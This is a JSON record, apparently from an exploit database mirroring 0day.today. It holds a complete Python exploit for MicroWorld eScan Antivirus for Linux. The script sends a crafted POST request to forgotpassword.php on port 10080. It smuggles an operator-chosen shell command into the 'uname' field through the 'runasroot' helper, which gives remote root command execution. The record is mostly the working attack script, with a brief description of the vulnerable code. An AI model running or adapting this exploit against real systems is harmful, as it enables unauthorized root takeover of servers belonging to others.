{"type": "zdt", "lastseen": "2016-04-20T02:06:45", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "MicroWorld eScan Antivirus < 3.x Remote Root Command Execution", "published": "2010-03-13T00:00:00", "href": "http://0day.today/exploit/description/9639", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category remote exploits", "hash": "7ca0a7aea24f0870825d99110d71ebd154906027c8c794559f7243357f4fd0b5", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "==============================================================\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\n==============================================================\r\n\r\n#!/usr/bin/env python\r\nimport sys\r\nfrom socket import *\r\n \r\n#auther: Mohammed almutairi\r\n#(Sa.attacker@gmail.com)\r\n\"\"\"\r\nMicroWorld eScan Antivirus < 3.x Remote Root Command Execution\r\nPackage MWADMIN package vulnerabilities (linux)\r\nThe Base Packages (MWADMIN and MWAV) must be installed before eScan\r\nLink:\r\nhttp://www.escanav.com/english/content/products/escan_linux/linux_products.asp\r\ninfcted: aLL version 3.X eScan linux\r\n1-Escan for Linux Desktop\r\n2-Escan for Linux file Servers\r\n3-MailScan for Linux and webscan\r\nTested On RedHat and Fedora\r\nULTRA PRIV8 :)\r\n \r\nDescription:\r\n \r\nFrom /opt/MicroWorld/var/www/htdocs/forgotpassword.php:\r\ninclude(\"common_functions.php\"); <---> (1)\r\n \r\nif ($_POST['forgot'] == \"Send Password\")\r\n{\r\n $user = $_POST[\"uname\"]; <--->(2) insecure:(\r\n \r\n \r\nvulnerable code in forgotpassword.php and common_functions.php\r\nin (1) $runasroot = \"/opt/MicroWorld/sbin/runasroot\";\r\nwe can injection through via the file forgotpassword.php As you can see (2)\r\nwith remote root Command Execution\r\n>> eScan.py www.***.com\r\neScan@/bin/sh:$Sa$ => reboot\r\n[*] Done! sent to: www.***.com\r\n\"\"\"\r\n \r\ndef xpl():\r\n if len(sys.argv) < 2:\r\n print \"[*] MicroWorld eScan Antivirus Remote Root Command Execution\"\r\n print \"[*] exploited by Mohammed almutairi\"\r\n print \"[*] usage: %s host\" % sys.argv[0]\r\n return\r\n \r\n host = sys.argv[1]\r\n port = 10080 # default port\r\n cmd = raw_input(\"eScan@/bin/sh:$Sa$ => \")\r\n sock=socket(AF_INET, SOCK_STREAM)\r\n sock.connect((host,port))\r\n sh=\"/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'\" % cmd\r\n \r\n sa= \"uname=;%s;\" %sh # (;sh;) ---> Here Play See to ^(2)^\r\n sa+= \"&forgot=Send+Password\"\r\n \r\n s=\"POST /forgotpassword.php HTTP/1.1\\r\\n\"\r\n s+=\"Host: %s:%d\\r\\n\"%(host, port)\r\n s+=\"User-Agent: */*\\r\\n\"\r\n s+=\"Accept: ar,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n s+=\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n s+=\"Content-Length: %d \\r\\n\\r\\n\"%len(sa)\r\n s+=sa\r\n \r\n sock.sendall(s)\r\n print \"[*] Done! sent to: %s\" % host\r\n sock.close()\r\n \r\nif __name__==\"__main__\":\r\n xpl()\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-9639", "sourceHref": "http://0day.today/exploit/9639", "modified": "2010-03-13T00:00:00", "reporter": "Mohammed almutairi", "enchantments": {"vulnersScore": 10.0}}

{"result": {}}